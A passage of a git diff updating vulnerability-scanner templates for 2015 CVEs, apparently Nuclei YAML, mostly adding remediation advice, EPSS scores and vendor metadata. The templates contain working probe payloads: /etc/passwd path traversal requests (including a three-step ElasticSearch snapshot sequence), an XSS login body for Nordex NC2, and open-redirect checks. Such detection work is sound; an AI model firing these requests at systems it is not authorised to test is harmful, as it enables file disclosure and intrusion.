b/http/cves/2015/CVE-2015-4074.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task. + remediation: | + Upgrade to Joomla! Helpdesk Pro plugin version 1.4.0 or later to fix the local file inclusion vulnerability. reference: - https://packetstormsecurity.com/files/132766/Joomla-Helpdesk-Pro-XSS-File-Disclosure-SQL-Injection.html - https://www.exploit-db.com/exploits/37666/ @@ -15,9 +17,15 @@ info: cvss-score: 7.5 cve-id: CVE-2015-4074 cwe-id: CWE-22 - tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin + epss-score: 0.00598 + epss-percentile: 0.76026 + cpe: cpe:2.3:a:helpdesk_pro_project:helpdesk_pro:*:*:*:*:*:joomla\!:*:* metadata: max-request: 1 + vendor: helpdesk_pro_project + product: helpdesk_pro + framework: joomla\! + tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin http: - method: GET @@ -26,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" @@ -35,4 +42,4 @@ http: status: - 200 -# Enhanced by cs on 2022/09/08 +# digest: 4b0a00483046022100949b2e9b2b19f44c69020a8fd8421da8571b57aa0e37c6cbf079f424c19f70a1022100e09cd9a7a9e12827580b825541327a467d99256198a10566d44642ed3ce9f4e3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index 411334bf98..f826449d02 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -6,16 +6,27 @@ info: severity: medium description: | WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/. + remediation: | + Update to the latest version of the WordPress Church Admin plugin (0.810 or higher) to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/37112 - https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408 - https://wordpress.org/plugins/church-admin/changelog/ - https://nvd.nist.gov/vuln/detail/CVE-2015-4127 classification: + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2015-4127 - tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss + cwe-id: CWE-79 + epss-score: 0.0034 + epss-percentile: 0.68233 + cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: church_admin_project + product: church_admin + framework: wordpress + tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss http: - method: GET @@ -38,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/31 +# digest: 4b0a00483046022100d133287634b0de402f56793317b9ce462e06adfc05d6b26527e1086e895a7308022100ec33fa1be1621f0f49d74ca15c95f71d644041a26c2d37b4ed4dfa2d977244de:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml index 85ed92fa7a..eb23b0fa1d 100644 --- a/http/cves/2015/CVE-2015-4414.yaml +++ b/http/cves/2015/CVE-2015-4414.yaml @@ -3,20 +3,29 @@ id: CVE-2015-4414 info: name: WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal author: daffainfo - severity: high + severity: medium description: WordPress SE HTML5 Album Audio Player 1.1.0 contains a directory traversal vulnerability in download_audio.php that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + remediation: | + Update to the latest version of WordPress SE HTML5 Album Audio Player or apply the vendor-supplied patch to fix the directory traversal vulnerability. reference: - https://www.exploit-db.com/exploits/37274 - https://nvd.nist.gov/vuln/detail/CVE-2015-4414 - https://www.exploit-db.com/exploits/37274/ - http://packetstormsecurity.com/files/132266/WordPress-SE-HTML5-Album-Audio-Player-1.1.0-Directory-Traversal.html + - https://wpvulndb.com/vulnerabilities/8032 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2015-4414 cwe-id: CWE-22 + epss-score: 0.11221 + epss-percentile: 0.94561 + cpe: cpe:2.3:a:se_html5_album_audio_player_project:se_html5_album_audio_player:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: se_html5_album_audio_player_project + product: se_html5_album_audio_player + framework: wordpress google-query: inurl:"/wp-content/plugins/se-html5-album-audio-player" tags: cve,cve2015,wordpress,wp-plugin,lfi,edb,packetstorm @@ -27,7 +36,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -36,4 +44,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/08 +# digest: 4b0a0048304602210081bb41c0c871c7eec6ade32e99cacca798355dc20461f1775b2973d4f177fbc302210089bc42a175d409acbb96189b97790d8b74c3e9f5527678b3f795d3d8c6838603:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index 5c1210441d..20012bd14c 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml @@ -5,18 +5,27 @@ info: author: daffainfo severity: high description: Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search. + remediation: | + Upgrade to a patched version of Koha or apply the necessary security patches to fix the directory traversal vulnerability. reference: - https://www.exploit-db.com/exploits/37388 - https://nvd.nist.gov/vuln/detail/CVE-2015-4632 - https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/ + - https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408 + - https://koha-community.org/koha-3-14-16-released/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-4632 cwe-id: CWE-22 - tags: cve,cve2015,lfi,edb + epss-score: 0.02817 + epss-percentile: 0.89517 + cpe: cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: koha + product: koha + tags: cve,cve2015,lfi,edb http: - method: GET @@ -25,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -34,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/08 +# digest: 490a0046304402200f0f68a8f97cfe9aa98286dfabb74c0a38f660e60e5f6d6d490d7120596b0bcf022064377ded76c15c02b87d125f63dc95a3dbe3d9417db857937e2c113021e01b73:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index 2ebe8cc7cb..d22a00f89b 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -3,20 +3,29 @@ id: CVE-2015-4666 info: name: Xceedium Xsuite <=2.4.4.5 - Local File Inclusion author: 0x_Akoko - severity: high + severity: medium description: Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter. + remediation: | + Upgrade Xceedium Xsuite to a version higher than 2.4.4.5 or apply the necessary patches provided by the vendor. reference: - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt - http://packetstormsecurity.com/files/132809/Xceedium-Xsuite-Command-Injection-XSS-Traversal-Escalation.html - https://nvd.nist.gov/vuln/detail/CVE-2015-4666 + - https://support.ca.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html + - https://www.exploit-db.com/exploits/37708/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2015-4666 cwe-id: CWE-22 - tags: xceedium,xsuite,lfi,packetstorm,cve,cve2015 + epss-score: 0.02372 + epss-percentile: 0.88638 + cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xceedium + product: xsuite + tags: xceedium,xsuite,lfi,packetstorm,cve,cve2015 http: - method: GET @@ -25,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" @@ -34,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/13 +# digest: 4a0a00473045022028d06b0133798ffe86165b60bab6c9c358e62f7f7118073ad19c7cc47a54a898022100f838d657aa282803157e4ac16ace2448338acc4384a5b2546806616da4764232:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index 4024eaf344..38e3d762f2 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -6,19 +6,27 @@ info: severity: medium description: | Xsuite 2.4.4.5 and prior contains an open redirect vulnerability, which can allow a remote attacker to redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the redirurl parameter. + remediation: | + Upgrade Xsuite to a version higher than 2.4.4.5 to mitigate the open redirect vulnerability. reference: - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt - https://vuldb.com/?id.107082 - https://www.exploit-db.com/exploits/37708/ - https://nvd.nist.gov/vuln/detail/CVE-2015-4668 + - https://support.ca.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2015-4668 cwe-id: CWE-601 - tags: cve,cve2015,redirect,xsuite,xceedium,edb + epss-score: 0.00397 + epss-percentile: 0.706 + cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xceedium + product: xsuite + tags: cve,cve2015,redirect,xsuite,xceedium,edb http: - method: GET @@ -31,4 +39,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by mp on 2022/09/30 +# digest: 4b0a00483046022100eadb72da837209df394fd90ab0fb02f8531921116bcedb77211b21d522c6c49c0221009077f0d7dc99e31a9eb9d19805f6fdec470c1ea0cac2b50ddba8baca43cabdf9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index ddf2a1d13c..909bd24b06 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -5,18 +5,27 @@ info: author: 0x_Akoko severity: high description: WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file. + remediation: | + Update to the latest version of the WordPress Zip Attachments plugin (1.1.4) or remove the plugin if not needed. reference: - https://wordpress.org/plugins/zip-attachments/#developers - https://wpscan.com/vulnerability/8047 - https://nvd.nist.gov/vuln/detail/CVE-2015-4694 - http://www.vapid.dhs.org/advisory.php?v=126 + - https://wordpress.org/plugins/zip-attachments/changelog/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2015-4694 cwe-id: CWE-22 + epss-score: 0.02304 + epss-percentile: 0.88479 + cpe: cpe:2.3:a:zip_attachments_project:zip_attachments:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: zip_attachments_project + product: zip_attachments + framework: wordpress google-query: inurl:"/wp-content/plugins/zip-attachments" tags: cve2015,wp-plugin,wpscan,lfi,wordpress,cve @@ -27,7 +36,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" @@ -36,4 +44,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/12 +# digest: 490a00463044022071941e753294331dfa54b59a674ce824b146fc5e1e7c644fdcc34ed0b192cb4c0220604059a4c04afc6e2508a9a2ab5b9c65845c798eb996781f9e79f99907c18d41:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml index 54ceb93a2f..36bafe8cd3 100644 --- a/http/cves/2015/CVE-2015-5354.yaml +++ b/http/cves/2015/CVE-2015-5354.yaml @@ -5,19 +5,27 @@ info: author: 0x_Akoko severity: medium description: Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login. + remediation: | + Apply the latest security patches or upgrade to a newer version of Novius OS. reference: - https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html - https://vuldb.com/?id.76181 - http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html - https://nvd.nist.gov/vul n/detail/CVE-2015-5354 + - https://www.exploit-db.com/exploits/37439/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-score: 5.8 cve-id: CVE-2015-5354 cwe-id: CWE-601 - tags: packetstorm,cve,cve2015,redirect,novius + epss-score: 0.00166 + epss-percentile: 0.53086 + cpe: cpe:2.3:a:novius-os:novius_os:5.0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: novius-os + product: novius_os + tags: packetstorm,cve,cve2015,redirect,novius http: - method: GET @@ -30,4 +38,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by mp on 2022/07/22 +# digest: 490a00463044022052f2ff6778cd14a0dac85cde42ec06d9d41fcc2f3f5a33927952ecf2e4b953bd02205d72c190194d4970de9b02a3c7c6d4f4235088a7bf5f11c459ce9b2d46eb9878:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index 03946dca03..e6ca3f118d 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -5,18 +5,27 @@ info: author: 0x_Akoko severity: medium description: WordPress StageShow plugin before 5.0.9 contains an open redirect vulnerability in the Redirect function in stageshow_redirect.php. A remote attacker can redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the url parameter. + remediation: | + Update to the latest version of the WordPress StageShow plugin (5.0.9 or higher) to fix the open redirect vulnerability. reference: - https://wpscan.com/vulnerability/afc0d5b5-280f-424f-bc3e-d04452e56e16 - https://wordpress.org/plugins/stageshow/changelog/ - http://seclists.org/fulldisclosure/2015/Jul/27 - https://nvd.nist.gov/vuln/detail/CVE-2015-5461 + - https://plugins.trac.wordpress.org/changeset/1165310/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N cvss-score: 6.4 cve-id: CVE-2015-5461 cwe-id: NVD-CWE-Other + epss-score: 0.0055 + epss-percentile: 0.74915 + cpe: cpe:2.3:a:stageshow_project:stageshow:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: stageshow_project + product: stageshow + framework: wordpress google-query: inurl:"/wp-content/plugins/stageshow/" tags: wpscan,seclists,redirect,cve,cve2015,wordpress,wp-plugin @@ -27,8 +36,8 @@ http: matchers: - type: regex + part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - part: header -# Enhanced by mp on 2022/09/30 +# digest: 4a0a00473045022100ac428ddf1d0361d027e7d3c5f7986142a25b255257929bbe151c7addc784191902207f1b575827253a42bbe52255c35f60fcad45b35fc0d5b815eda5e275184840f8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index 31ec62651f..9c8c1a6b84 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: WordPress MDC YouTube Downloader 2.1.0 plugin is susceptible to local file inclusion. A remote attacker can read arbitrary files via a full pathname in the file parameter to includes/download.php. + remediation: | + Update to the latest version of WordPress MDC YouTube Downloader plugin or apply the patch provided by the vendor. reference: - https://www.openwall.com/lists/oss-security/2015/07/10/5 - http://www.vapid.dhs.org/advisory.php?v=133 @@ -15,9 +17,15 @@ info: cvss-score: 7.5 cve-id: CVE-2015-5469 cwe-id: CWE-22 - tags: cve,cve2015,wp,lfi + epss-score: 0.02176 + epss-percentile: 0.88146 + cpe: cpe:2.3:a:mdc_youtube_downloader_project:mdc_youtube_downloader:2.1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: mdc_youtube_downloader_project + product: mdc_youtube_downloader + framework: wordpress + tags: cve,cve2015,wp,lfi http: - method: GET @@ -26,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" @@ -35,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/30 +# digest: 4a0a00473045022100a4d903cca4f9f615bcf696b15cbafa615743d4fa1f2ce74320278a305fdb2e6802200fa2311af283c9fbf42623995bfc5063ac2b69b8193334cf4c5af379c13c5cc8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index 67123711ab..f9d36af471 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -5,19 +5,26 @@ info: author: 0x_Akoko severity: medium description: The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system. + remediation: Upgrade to Swim Team version 1.45 or newer. reference: - https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568 - http://www.vapid.dhs.org/advisory.php?v=134 - https://nvd.nist.gov/vuln/detail/CVE-2015-5471 - http://packetstormsecurity.com/files/132653/WordPress-WP-SwimTeam-1.44.10777-Arbitrary-File-Download.html - remediation: Upgrade to Swim Team version 1.45 or newer. + - http://michaelwalsh.org/blog/2015/07/wp-swimteam-v1-45-beta-3-now-available/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2015-5471 cwe-id: CWE-22 + epss-score: 0.11139 + epss-percentile: 0.94539 + cpe: cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: swim_team_project + product: swim_team + framework: wordpress google-query: inurl:"/wp-content/plugins/wp-swimteam" tags: cve,cve2015,wordpress,wp-plugin,lfi,wpscan,packetstorm @@ -28,7 +35,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" @@ -37,4 +43,4 @@ http: status: - 200 -# Enhanced by cs on 2022/02/25 +# digest: 4a0a0047304502203f2b6605243e82bde2276688638bacfca42e399e4849a47e322f5e3a619a473c022100968fa583e8dbb6a9ccafb1978c715d81e23eecd19e0c5d58c4ba8124b5f807b2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index 5676ccf215..180cf627c7 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -3,21 +3,29 @@ id: CVE-2015-5531 info: name: ElasticSearch <1.6.1 - Local File Inclusion author: princechaddha - severity: high + severity: medium description: ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls. + remediation: | + Upgrade ElasticSearch to version 1.6.1 or later to mitigate the vulnerability. reference: - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531 - https://nvd.nist.gov/vuln/detail/CVE-2015-5531 - http://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html - https://www.elastic.co/community/security/ + - http://packetstormsecurity.com/files/133797/ElasticSearch-Path-Traversal-Arbitrary-File-Download.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2015-5531 cwe-id: CWE-22 - tags: vulhub,packetstorm,cve,cve2015,elasticsearch + epss-score: 0.97144 + epss-percentile: 0.99722 + cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 3 + vendor: elasticsearch + product: elasticsearch + tags: vulhub,packetstorm,cve,cve2015,elasticsearch,intrusive http: - raw: @@ -31,7 +39,6 @@ http: "location": "/usr/share/elasticsearch/repo/test" } } - - | PUT /_snapshot/test2 HTTP/1.1 Host: {{Hostname}} @@ -42,7 +49,6 @@ http: "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" } } - - | GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 Host: {{Hostname}} @@ -52,13 +58,13 @@ http: - type: word part: body words: - - 'ElasticsearchParseException' - - 'Failed to derive xcontent from' - - '114, 111, 111, 116, 58' + - ElasticsearchParseException + - Failed to derive xcontent from + - 114, 111, 111, 116, 58 condition: and - type: status status: - 400 -# Enhanced by mp on 2022/06/08 +# digest: 4b0a00483046022100fc8698bd2620ac769885e882aa3a5a4e75a8428ea1c51bb8cdc5fa9842e15dca022100a8847166448900f5d16bd1b357d994e0b762d2c7f0fb81aa8ddfdd71e07bab41:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index 479fa73403..6eb5a40a53 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -3,21 +3,30 @@ id: CVE-2015-5688 info: name: Geddy <13.0.8 - Local File Inclusion author: pikpikcu - severity: high + severity: medium description: Geddy prior to version 13.0.8 contains a directory traversal vulnerability in lib/app/index.js that allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI. + remediation: | + Upgrade Geddy to version 13.0.8 or later to mitigate the vulnerability. reference: - https://nodesecurity.io/advisories/geddy-directory-traversal - https://github.com/geddy/geddy/issues/697 - https://github.com/geddy/geddy/commit/2de63b68b3aa6c08848f261ace550a37959ef231 - https://nvd.nist.gov/vuln/detail/CVE-2015-5688 + - https://github.com/geddy/geddy/pull/699 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2015-5688 cwe-id: CWE-22 - tags: cve,cve2015,geddy,lfi + epss-score: 0.01347 + epss-percentile: 0.84659 + cpe: cpe:2.3:a:geddyjs:geddy:13.0.7:*:*:*:*:node.js:*:* metadata: max-request: 1 + vendor: geddyjs + product: geddy + framework: node.js + tags: cve,cve2015,geddy,lfi http: - method: GET @@ -27,12 +36,12 @@ http: matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: - 200 -# Enhanced by mp on 2022/06/08 +# digest: 4a0a00473045022023ae1fe272df5372c6c6127fb283bfe8742939b51d3107e7c261c8e77f57e180022100c9e99bcc7fffa8aceba69592057c0335822778352339ffea1fd689ef89f1d939:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml index b18f0b8d14..51afe48903 100644 --- a/http/cves/2015/CVE-2015-6477.yaml +++ b/http/cves/2015/CVE-2015-6477.yaml @@ -5,23 +5,33 @@ info: author: geeknik severity: medium description: Nordex NC2 contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://seclists.org/fulldisclosure/2015/Dec/117 - https://ics-cert.us-cert.gov/advisories/ICSA-15-286-01 - https://nvd.nist.gov/vuln/detail/CVE-2015-6477 + - http://packetstormsecurity.com/files/135068/Nordex-Control-2-NC2-SCADA-16-Cross-Site-Scripting.html + - http://seclists.org/fulldisclosure/2015/Dec/117 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2015-6477 cwe-id: CWE-79 - tags: xss,iot,nordex,nc2,seclists,cve,cve2015 + epss-score: 0.00294 + epss-percentile: 0.6579 + cpe: cpe:2.3:o:nordex:nordex_control_2_scada:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: nordex + product: nordex_control_2_scada + tags: seclists,packetstorm,xss,iot,nordex,nc2,cve,cve2015 http: - method: POST path: - "{{BaseURL}}/login" + body: 'connection=basic&userName=admin%27%22%29%3B%7D%3C%2Fscript%3E%3Cscript%3Ealert%28%27{{randstr}}%27%29%3C%2Fscript%3E&pw=nordex&language=en' matchers-condition: and @@ -36,4 +46,4 @@ http: words: - "" -# Enhanced by mp on 2022/08/12 +# digest: 4b0a0048304602210096dd8e58aff1302f68dc44cf8d260d192ce44645e99c6e6d97fccf7920eaf42a022100ab090f8e22d6232a9cc250ca0584e7e97e7f7a36a3e6e8728d12b9a51a9c461e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml index 3c03cc3dcd..1475ebc344 100644 --- a/http/cves/2015/CVE-2015-6544.yaml +++ b/http/cves/2015/CVE-2015-6544.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Combodo iTop before 2.2.0-2459 contains a cross-site scripting vulnerability in application/dashboard.class.inc.php which allows remote attackers to inject arbitrary web script or HTML via a dashboard title. + remediation: | + Upgrade to a version of Combodo iTop that is equal to or greater than 2.2.0-2459 to mitigate this vulnerability. reference: - https://www.htbridge.com/advisory/HTB23268 - http://sourceforge.net/p/itop/tickets/1114/ @@ -16,9 +18,14 @@ info: cvss-score: 6.1 cve-id: CVE-2015-6544 cwe-id: CWE-79 - tags: cve,cve2015,xss,itop + epss-score: 0.00284 + epss-percentile: 0.65144 + cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: combodo + product: itop + tags: cve,cve2015,xss,itop http: - method: GET @@ -28,17 +35,17 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html -# Enhanced by mp on 2022/08/12 + - type: status + status: + - 200 + +# digest: 4b0a00483046022100c0278b0048afaffe559eea258744251130253e6680ffda433458fb6f199c6a410221009e93a9b460cd401252d5f542304fa97824b83ec7041ea606972b9ed06c963e87:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index f18c350f4e..1e8a08dcd0 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -5,18 +5,26 @@ info: author: daffainfo severity: medium description: WordPress sourceAFRICA plugin version 0.1.3 contains a cross-site scripting vulnerability. + remediation: | + Upgrade to the latest version of WordPress sourceAFRICA (>=0.1.4) which includes a fix for this vulnerability. reference: - http://packetstormsecurity.com/files/133371/WordPress-sourceAFRICA-0.1.3-Cross-Site-Scripting.html - https://wpvulndb.com/vulnerabilities/8169 - https://nvd.nist.gov/vuln/detail/CVE-2015-6920 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2015-6920 cwe-id: CWE-79 - cvss-score: 4.3 - tags: wp-plugin,xss,packetstorm,cve,cve2015,wordpress + epss-score: 0.0016 + epss-percentile: 0.52498 + cpe: cpe:2.3:a:sourceafrica_project:sourceafrica:0.1.3:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: sourceafrica_project + product: sourceafrica + framework: wordpress + tags: wp-plugin,xss,packetstorm,cve,cve2015,wordpress http: - method: GET @@ -26,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '">' - part: body - type: word part: header @@ -39,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 +# digest: 490a00463044022066d4e481da5f436542820d4f6b88ace1fb3b8481467694db76141e5a6bd4900a022011c776a8d36882a6f15c5a8048aff7a2715ca9bed3790be913339be218fbd688:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index 7a32cc56b1..eda8e9cc14 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -6,6 +6,8 @@ info: severity: high description: | D-Link DVG-N5402SP is susceptible to local file inclusion in products with firmware W1000CN-00, W1000CN-03, or W2000EN-00. A remote attacker can read sensitive information via a .. (dot dot) in the errorpage parameter. + remediation: | + Update the router firmware to the latest version, which includes a fix for the local file inclusion 